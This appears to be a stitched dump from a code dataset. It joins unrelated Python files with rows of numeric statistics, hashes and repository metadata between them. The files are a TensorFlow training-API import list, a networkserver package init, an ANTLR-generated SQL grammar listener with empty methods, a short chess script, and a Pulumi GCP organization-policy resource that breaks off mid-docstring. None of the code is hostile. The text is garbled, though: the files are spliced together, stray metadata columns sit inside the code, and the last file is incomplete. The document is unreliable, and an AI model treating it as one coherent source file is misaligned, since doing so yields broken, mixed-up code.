from tensorflow.python.training.adadelta import AdadeltaOptimizer
from tensorflow.python.training.adagrad import AdagradOptimizer
from tensorflow.python.training.adagrad_da import AdagradDAOptimizer
from tensorflow.python.training.adam import AdamOptimizer
from tensorflow.python.training.basic_loops import basic_train_loop
from tensorflow.python.training.basic_session_run_hooks import CheckpointSaverHook
from tensorflow.python.training.basic_session_run_hooks import CheckpointSaverListener
from tensorflow.python.training.basic_session_run_hooks import FeedFnHook
from tensorflow.python.training.basic_session_run_hooks import FinalOpsHook
from tensorflow.python.training.basic_session_run_hooks import GlobalStepWaiterHook
from tensorflow.python.training.basic_session_run_hooks import LoggingTensorHook
from tensorflow.python.training.basic_session_run_hooks import NanLossDuringTrainingError
from tensorflow.python.training.basic_session_run_hooks import NanTensorHook
from tensorflow.python.training.basic_session_run_hooks import ProfilerHook
from tensorflow.python.training.basic_session_run_hooks import SecondOrStepTimer
from tensorflow.python.training.basic_session_run_hooks import StepCounterHook
from tensorflow.python.training.basic_session_run_hooks import StopAtStepHook
from tensorflow.python.training.basic_session_run_hooks import SummarySaverHook
from tensorflow.python.training.checkpoint_management import CheckpointManager
from tensorflow.python.training.checkpoint_management import checkpoint_exists
from tensorflow.python.training.checkpoint_management import generate_checkpoint_state_proto
from tensorflow.python.training.checkpoint_management import get_checkpoint_mtimes
from tensorflow.python.training.checkpoint_management import get_checkpoint_state
from tensorflow.python.training.checkpoint_management import latest_checkpoint
from tensorflow.python.training.checkpoint_management import remove_checkpoint
from tensorflow.python.training.checkpoint_management import update_checkpoint_state
from tensorflow.python.training.checkpoint_utils import checkpoints_iterator
from tensorflow.python.training.checkpoint_utils import init_from_checkpoint
from tensorflow.python.training.checkpoint_utils import list_variables
from tensorflow.python.training.checkpoint_utils import load_checkpoint
from tensorflow.python.training.checkpoint_utils import load_variable
from tensorflow.python.training.coordinator import Coordinator
from tensorflow.python.training.coordinator import LooperThread
from tensorflow.python.training.device_setter import replica_device_setter
from tensorflow.python.training.ftrl import FtrlOptimizer
from tensorflow.python.training.gradient_descent import GradientDescentOptimizer
from tensorflow.python.training.input import batch
from tensorflow.python.training.input import batch_join
from tensorflow.python.training.input import input_producer
from tensorflow.python.training.input import limit_epochs
from tensorflow.python.training.input import match_filenames_once
from tensorflow.python.training.input import maybe_batch
from tensorflow.python.training.input import maybe_batch_join
from tensorflow.python.training.input import maybe_shuffle_batch
from tensorflow.python.training.input import maybe_shuffle_batch_join
from tensorflow.python.training.input import range_input_producer
from tensorflow.python.training.input import shuffle_batch
from tensorflow.python.training.input import shuffle_batch_join
from tensorflow.python.training.input import slice_input_producer
from tensorflow.python.training.input import string_input_producer
from tensorflow.python.training.learning_rate_decay import cosine_decay
from tensorflow.python.training.learning_rate_decay import cosine_decay_restarts
from tensorflow.python.training.learning_rate_decay import exponential_decay
from tensorflow.python.training.learning_rate_decay import inverse_time_decay
from tensorflow.python.training.learning_rate_decay import linear_cosine_decay
from tensorflow.python.training.learning_rate_decay import natural_exp_decay
from tensorflow.python.training.learning_rate_decay import noisy_linear_cosine_decay
from tensorflow.python.training.learning_rate_decay import piecewise_constant
from tensorflow.python.training.learning_rate_decay import piecewise_constant as piecewise_constant_decay
from tensorflow.python.training.learning_rate_decay import polynomial_decay
from tensorflow.python.training.momentum import MomentumOptimizer
from tensorflow.python.training.monitored_session import ChiefSessionCreator
from tensorflow.python.training.monitored_session import MonitoredSession
from tensorflow.python.training.monitored_session import MonitoredTrainingSession
from tensorflow.python.training.monitored_session import Scaffold
from tensorflow.python.training.monitored_session import SessionCreator
from tensorflow.python.training.monitored_session import SingularMonitoredSession
from tensorflow.python.training.monitored_session import WorkerSessionCreator
from tensorflow.python.training.moving_averages import ExponentialMovingAverage
from tensorflow.python.training.optimizer import Optimizer
from tensorflow.python.training.proximal_adagrad import ProximalAdagradOptimizer
from tensorflow.python.training.proximal_gradient_descent import ProximalGradientDescentOptimizer
from tensorflow.python.training.queue_runner_impl import QueueRunner
from tensorflow.python.training.queue_runner_impl import add_queue_runner
from tensorflow.python.training.queue_runner_impl import start_queue_runners
from tensorflow.python.training.rmsprop import RMSPropOptimizer
from tensorflow.python.training.saver import Saver
from tensorflow.python.training.saver import export_meta_graph
from tensorflow.python.training.saver import import_meta_graph
from tensorflow.python.training.server_lib import ClusterSpec
from tensorflow.python.training.server_lib import Server
from tensorflow.python.training.session_manager import SessionManager
from tensorflow.python.training.session_run_hook import SessionRunArgs
from tensorflow.python.training.session_run_hook import SessionRunContext
from tensorflow.python.training.session_run_hook import SessionRunHook
from tensorflow.python.training.session_run_hook import SessionRunValues
from tensorflow.python.training.supervisor import Supervisor
from tensorflow.python.training.sync_replicas_optimizer import SyncReplicasOptimizer
from tensorflow.python.training.tracking.util import CheckpointV1 as Checkpoint
from tensorflow.python.training.training import BytesList
from tensorflow.python.training.training import ClusterDef
from tensorflow.python.training.training import Example
from tensorflow.python.training.training import Feature
from tensorflow.python.training.training import FeatureList
from tensorflow.python.training.training import FeatureLists
from tensorflow.python.training.training import Features
from tensorflow.python.training.training import FloatList
from tensorflow.python.training.training import Int64List
from tensorflow.python.training.training import JobDef
from tensorflow.python.training.training import SaverDef
from tensorflow.python.training.training import SequenceExample
from tensorflow.python.training.training_util import assert_global_step
from tensorflow.python.training.training_util import create_global_step
from tensorflow.python.training.training_util import get_global_step
from tensorflow.python.training.training_util import get_or_create_global_step
from tensorflow.python.training.training_util import global_step
from tensorflow.python.training.warm_starting_util import VocabInfo
from tensorflow.python.training.warm_starting_util import warm_start
del _print_function
| 64.706767
| 105
| 0.896003
| 1,089
| 8,606
| 6.86685
| 0.189164
| 0.250334
| 0.310243
| 0.404386
| 0.704065
| 0.658732
| 0.552955
| 0.419363
| 0.265579
| 0.071008
| 0
| 0.000495
| 0.060074
| 8,606
| 132
| 106
| 65.19697
| 0.923971
| 0.026726
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008264
| 1
| 0
| true
| 0
| 0.991736
| 0
| 0.991736
| 0.024793
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
53ba915cacc281d87ab55f1e308d5a6221c7a741
| 71
|
py
|
Python
|
theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/networkserver/__init__.py
|
emirgo/WeatherStation
|
f0f8c3464470991fc962d83cea20f3bcfd6a04b6
|
[
"MIT"
] | 32
|
2017-11-01T16:03:48.000Z
|
2021-11-16T12:35:34.000Z
|
theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/networkserver/__init__.py
|
emirgo/WeatherStation
|
f0f8c3464470991fc962d83cea20f3bcfd6a04b6
|
[
"MIT"
] | 28
|
2017-11-20T09:45:59.000Z
|
2021-12-14T09:31:24.000Z
|
theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/networkserver/__init__.py
|
emirgo/WeatherStation
|
f0f8c3464470991fc962d83cea20f3bcfd6a04b6
|
[
"MIT"
] | 22
|
2017-11-03T10:21:50.000Z
|
2021-04-08T05:20:51.000Z
|
from .networkserver_pb2_grpc import *
from .networkserver_pb2 import *
| 23.666667
| 37
| 0.830986
| 9
| 71
| 6.222222
| 0.555556
| 0.607143
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031746
| 0.112676
| 71
| 2
| 38
| 35.5
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
53f2d949c65ee54393a2e4a95412be97655c2ddd
| 9,102
|
py
|
Python
|
Front-end/antlr/SQLGramaticaListener.py
|
cor14095/probases1
|
0e99fde61108379a22339603f94238aa81808968
|
[
"MIT"
] | 1
|
2017-04-02T01:52:57.000Z
|
2017-04-02T01:52:57.000Z
|
Front-end/antlr/SQLGramaticaListener.py
|
cor14095/probases1
|
0e99fde61108379a22339603f94238aa81808968
|
[
"MIT"
] | null | null | null |
Front-end/antlr/SQLGramaticaListener.py
|
cor14095/probases1
|
0e99fde61108379a22339603f94238aa81808968
|
[
"MIT"
] | null | null | null |
# Generated from gramatica/SQLGramatica.g4 by ANTLR 4.7
from antlr4 import *
# This class defines a complete listener for a parse tree produced by SQLGramaticaParser.
class SQLGramaticaListener(ParseTreeListener):
# Enter a parse tree produced by SQLGramaticaParser#literal.
def enterLiteral(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#literal.
def exitLiteral(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#fecha.
def enterFecha(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#fecha.
def exitFecha(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#programa.
def enterPrograma(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#programa.
def exitPrograma(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#database.
def enterDatabase(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#database.
def exitDatabase(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#createDatabase.
def enterCreateDatabase(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#createDatabase.
def exitCreateDatabase(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#alterDatabase.
def enterAlterDatabase(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#alterDatabase.
def exitAlterDatabase(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#dropDatabase.
def enterDropDatabase(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#dropDatabase.
def exitDropDatabase(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#showDatabase.
def enterShowDatabase(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#showDatabase.
def exitShowDatabase(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#useDatabase.
def enterUseDatabase(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#useDatabase.
def exitUseDatabase(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#opTable.
def enterOpTable(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#opTable.
def exitOpTable(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#tipo.
def enterTipo(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#tipo.
def exitTipo(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#createTable.
def enterCreateTable(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#createTable.
def exitCreateTable(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#constraint.
def enterConstraint(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#constraint.
def exitConstraint(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#primaryKey.
def enterPrimaryKey(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#primaryKey.
def exitPrimaryKey(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#foreignKey.
def enterForeignKey(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#foreignKey.
def exitForeignKey(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#check.
def enterCheck(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#check.
def exitCheck(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#exp.
def enterExp(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#exp.
def exitExp(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#orExpression.
def enterOrExpression(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#orExpression.
def exitOrExpression(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#andExpression.
def enterAndExpression(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#andExpression.
def exitAndExpression(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#equalsExpression.
def enterEqualsExpression(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#equalsExpression.
def exitEqualsExpression(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#relationExpression.
def enterRelationExpression(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#relationExpression.
def exitRelationExpression(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#addSubsExpression.
def enterAddSubsExpression(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#addSubsExpression.
def exitAddSubsExpression(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#mulDivExpression.
def enterMulDivExpression(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#mulDivExpression.
def exitMulDivExpression(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#basicExpression.
def enterBasicExpression(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#basicExpression.
def exitBasicExpression(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#alterTable.
def enterAlterTable(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#alterTable.
def exitAlterTable(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#action.
def enterAction(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#action.
def exitAction(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#dropTable.
def enterDropTable(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#dropTable.
def exitDropTable(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#showTables.
def enterShowTables(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#showTables.
def exitShowTables(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#showColumns.
def enterShowColumns(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#showColumns.
def exitShowColumns(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#insertInto.
def enterInsertInto(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#insertInto.
def exitInsertInto(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#updateSet.
def enterUpdateSet(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#updateSet.
def exitUpdateSet(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#deleteFrom.
def enterDeleteFrom(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#deleteFrom.
def exitDeleteFrom(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#selectFrom.
def enterSelectFrom(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#selectFrom.
def exitSelectFrom(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#sep.
def enterSep(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#sep.
def exitSep(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#rel_op.
def enterRel_op(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#rel_op.
def exitRel_op(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#eq_op.
def enterEq_op(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#eq_op.
def exitEq_op(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#add_op.
def enterAdd_op(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#add_op.
def exitAdd_op(self, ctx):
pass
# Enter a parse tree produced by SQLGramaticaParser#mult_op.
def enterMult_op(self, ctx):
pass
# Exit a parse tree produced by SQLGramaticaParser#mult_op.
def exitMult_op(self, ctx):
pass
| 26.080229
| 89
| 0.690947
| 1,032
| 9,102
| 6.078488
| 0.140504
| 0.073649
| 0.122748
| 0.220947
| 0.807429
| 0.807429
| 0.801371
| 0.800574
| 0.652001
| 0.641798
| 0
| 0.000586
| 0.249506
| 9,102
| 348
| 90
| 26.155172
| 0.917728
| 0.518238
| 0
| 0.493506
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.493506
| false
| 0.493506
| 0.006494
| 0
| 0.506494
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
53fe281b711789e1b1d841bfc17dcfa4d3417ad5
| 47
|
py
|
Python
|
chess_main.py
|
ChessGameGroup/chess_game
|
01d140d5b274bdd76a78e59b1d96c11b18ebc8d5
|
[
"MIT"
] | null | null | null |
chess_main.py
|
ChessGameGroup/chess_game
|
01d140d5b274bdd76a78e59b1d96c11b18ebc8d5
|
[
"MIT"
] | null | null | null |
chess_main.py
|
ChessGameGroup/chess_game
|
01d140d5b274bdd76a78e59b1d96c11b18ebc8d5
|
[
"MIT"
] | null | null | null |
from functions import print_grid
print_grid()
| 11.75
| 32
| 0.829787
| 7
| 47
| 5.285714
| 0.714286
| 0.486486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12766
| 47
| 3
| 33
| 15.666667
| 0.902439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 1
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
072bee0fbeaad20da79672c991cb9ef1aa233107
| 28,424
|
py
|
Python
|
sdk/python/pulumi_gcp/organizations/policy.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/organizations/policy.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/organizations/policy.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PolicyArgs', 'Policy']
@pulumi.input_type
class PolicyArgs:
def __init__(__self__, *,
constraint: pulumi.Input[str],
org_id: pulumi.Input[str],
boolean_policy: Optional[pulumi.Input['PolicyBooleanPolicyArgs']] = None,
list_policy: Optional[pulumi.Input['PolicyListPolicyArgs']] = None,
restore_policy: Optional[pulumi.Input['PolicyRestorePolicyArgs']] = None,
version: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Policy resource.
:param pulumi.Input[str] constraint: The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
:param pulumi.Input[str] org_id: The numeric ID of the organization to set the policy for.
:param pulumi.Input['PolicyBooleanPolicyArgs'] boolean_policy: A boolean policy is a constraint that is either enforced or not. Structure is documented below.
:param pulumi.Input['PolicyListPolicyArgs'] list_policy: A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
:param pulumi.Input['PolicyRestorePolicyArgs'] restore_policy: A restore policy is a constraint to restore the default policy. Structure is documented below.
:param pulumi.Input[int] version: Version of the Policy. Default version is 0.
"""
pulumi.set(__self__, "constraint", constraint)
pulumi.set(__self__, "org_id", org_id)
if boolean_policy is not None:
pulumi.set(__self__, "boolean_policy", boolean_policy)
if list_policy is not None:
pulumi.set(__self__, "list_policy", list_policy)
if restore_policy is not None:
pulumi.set(__self__, "restore_policy", restore_policy)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def constraint(self) -> pulumi.Input[str]:
"""
The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
"""
return pulumi.get(self, "constraint")
@constraint.setter
def constraint(self, value: pulumi.Input[str]):
pulumi.set(self, "constraint", value)
@property
@pulumi.getter(name="orgId")
def org_id(self) -> pulumi.Input[str]:
"""
The numeric ID of the organization to set the policy for.
"""
return pulumi.get(self, "org_id")
@org_id.setter
def org_id(self, value: pulumi.Input[str]):
pulumi.set(self, "org_id", value)
@property
@pulumi.getter(name="booleanPolicy")
def boolean_policy(self) -> Optional[pulumi.Input['PolicyBooleanPolicyArgs']]:
"""
A boolean policy is a constraint that is either enforced or not. Structure is documented below.
"""
return pulumi.get(self, "boolean_policy")
@boolean_policy.setter
def boolean_policy(self, value: Optional[pulumi.Input['PolicyBooleanPolicyArgs']]):
pulumi.set(self, "boolean_policy", value)
@property
@pulumi.getter(name="listPolicy")
def list_policy(self) -> Optional[pulumi.Input['PolicyListPolicyArgs']]:
"""
A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
"""
return pulumi.get(self, "list_policy")
@list_policy.setter
def list_policy(self, value: Optional[pulumi.Input['PolicyListPolicyArgs']]):
pulumi.set(self, "list_policy", value)
@property
@pulumi.getter(name="restorePolicy")
def restore_policy(self) -> Optional[pulumi.Input['PolicyRestorePolicyArgs']]:
"""
A restore policy is a constraint to restore the default policy. Structure is documented below.
"""
return pulumi.get(self, "restore_policy")
@restore_policy.setter
def restore_policy(self, value: Optional[pulumi.Input['PolicyRestorePolicyArgs']]):
pulumi.set(self, "restore_policy", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[int]]:
"""
Version of the Policy. Default version is 0.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class _PolicyState:
def __init__(__self__, *,
boolean_policy: Optional[pulumi.Input['PolicyBooleanPolicyArgs']] = None,
constraint: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
list_policy: Optional[pulumi.Input['PolicyListPolicyArgs']] = None,
org_id: Optional[pulumi.Input[str]] = None,
restore_policy: Optional[pulumi.Input['PolicyRestorePolicyArgs']] = None,
update_time: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Policy resources.
:param pulumi.Input['PolicyBooleanPolicyArgs'] boolean_policy: A boolean policy is a constraint that is either enforced or not. Structure is documented below.
:param pulumi.Input[str] constraint: The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
:param pulumi.Input[str] etag: (Computed) The etag of the organization policy. `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other.
:param pulumi.Input['PolicyListPolicyArgs'] list_policy: A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
:param pulumi.Input[str] org_id: The numeric ID of the organization to set the policy for.
:param pulumi.Input['PolicyRestorePolicyArgs'] restore_policy: A restore policy is a constraint to restore the default policy. Structure is documented below.
:param pulumi.Input[str] update_time: (Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z".
:param pulumi.Input[int] version: Version of the Policy. Default version is 0.
"""
if boolean_policy is not None:
pulumi.set(__self__, "boolean_policy", boolean_policy)
if constraint is not None:
pulumi.set(__self__, "constraint", constraint)
if etag is not None:
pulumi.set(__self__, "etag", etag)
if list_policy is not None:
pulumi.set(__self__, "list_policy", list_policy)
if org_id is not None:
pulumi.set(__self__, "org_id", org_id)
if restore_policy is not None:
pulumi.set(__self__, "restore_policy", restore_policy)
if update_time is not None:
pulumi.set(__self__, "update_time", update_time)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="booleanPolicy")
def boolean_policy(self) -> Optional[pulumi.Input['PolicyBooleanPolicyArgs']]:
"""
A boolean policy is a constraint that is either enforced or not. Structure is documented below.
"""
return pulumi.get(self, "boolean_policy")
@boolean_policy.setter
def boolean_policy(self, value: Optional[pulumi.Input['PolicyBooleanPolicyArgs']]):
pulumi.set(self, "boolean_policy", value)
@property
@pulumi.getter
def constraint(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
"""
return pulumi.get(self, "constraint")
@constraint.setter
def constraint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "constraint", value)
@property
@pulumi.getter
def etag(self) -> Optional[pulumi.Input[str]]:
"""
(Computed) The etag of the organization policy. `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other.
"""
return pulumi.get(self, "etag")
@etag.setter
def etag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "etag", value)
@property
@pulumi.getter(name="listPolicy")
def list_policy(self) -> Optional[pulumi.Input['PolicyListPolicyArgs']]:
"""
A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
"""
return pulumi.get(self, "list_policy")
@list_policy.setter
def list_policy(self, value: Optional[pulumi.Input['PolicyListPolicyArgs']]):
pulumi.set(self, "list_policy", value)
@property
@pulumi.getter(name="orgId")
def org_id(self) -> Optional[pulumi.Input[str]]:
"""
The numeric ID of the organization to set the policy for.
"""
return pulumi.get(self, "org_id")
@org_id.setter
def org_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "org_id", value)
@property
@pulumi.getter(name="restorePolicy")
def restore_policy(self) -> Optional[pulumi.Input['PolicyRestorePolicyArgs']]:
"""
A restore policy is a constraint to restore the default policy. Structure is documented below.
"""
return pulumi.get(self, "restore_policy")
@restore_policy.setter
def restore_policy(self, value: Optional[pulumi.Input['PolicyRestorePolicyArgs']]):
pulumi.set(self, "restore_policy", value)
@property
@pulumi.getter(name="updateTime")
def update_time(self) -> Optional[pulumi.Input[str]]:
"""
(Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z".
"""
return pulumi.get(self, "update_time")
@update_time.setter
def update_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "update_time", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[int]]:
"""
Version of the Policy. Default version is 0.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "version", value)
class Policy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
boolean_policy: Optional[pulumi.Input[pulumi.InputType['PolicyBooleanPolicyArgs']]] = None,
constraint: Optional[pulumi.Input[str]] = None,
list_policy: Optional[pulumi.Input[pulumi.InputType['PolicyListPolicyArgs']]] = None,
org_id: Optional[pulumi.Input[str]] = None,
restore_policy: Optional[pulumi.Input[pulumi.InputType['PolicyRestorePolicyArgs']]] = None,
version: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Allows management of Organization policies for a Google Organization. For more information see
[the official
documentation](https://cloud.google.com/resource-manager/docs/organization-policy/overview) and
[API](https://cloud.google.com/resource-manager/reference/rest/v1/organizations/setOrgPolicy).
## Example Usage
To set policy with a [boolean constraint](https://cloud.google.com/resource-manager/docs/organization-policy/quickstart-boolean-constraints):
```python
import pulumi
import pulumi_gcp as gcp
serial_port_policy = gcp.organizations.Policy("serialPortPolicy",
boolean_policy=gcp.organizations.PolicyBooleanPolicyArgs(
enforced=True,
),
constraint="compute.disableSerialPortAccess",
org_id="123456789")
```
To set a policy with a [list constraint](https://cloud.google.com/resource-manager/docs/organization-policy/quickstart-list-constraints):
```python
import pulumi
import pulumi_gcp as gcp
services_policy = gcp.organizations.Policy("servicesPolicy",
constraint="serviceuser.services",
list_policy=gcp.organizations.PolicyListPolicyArgs(
allow=gcp.organizations.PolicyListPolicyAllowArgs(
all=True,
),
),
org_id="123456789")
```
Or to deny some services, use the following instead:
```python
import pulumi
import pulumi_gcp as gcp
services_policy = gcp.organizations.Policy("servicesPolicy",
constraint="serviceuser.services",
list_policy=gcp.organizations.PolicyListPolicyArgs(
deny=gcp.organizations.PolicyListPolicyDenyArgs(
values=["cloudresourcemanager.googleapis.com"],
),
suggested_value="compute.googleapis.com",
),
org_id="123456789")
```
To restore the default organization policy, use the following instead:
```python
import pulumi
import pulumi_gcp as gcp
services_policy = gcp.organizations.Policy("servicesPolicy",
constraint="serviceuser.services",
org_id="123456789",
restore_policy=gcp.organizations.PolicyRestorePolicyArgs(
default=True,
))
```
## Import
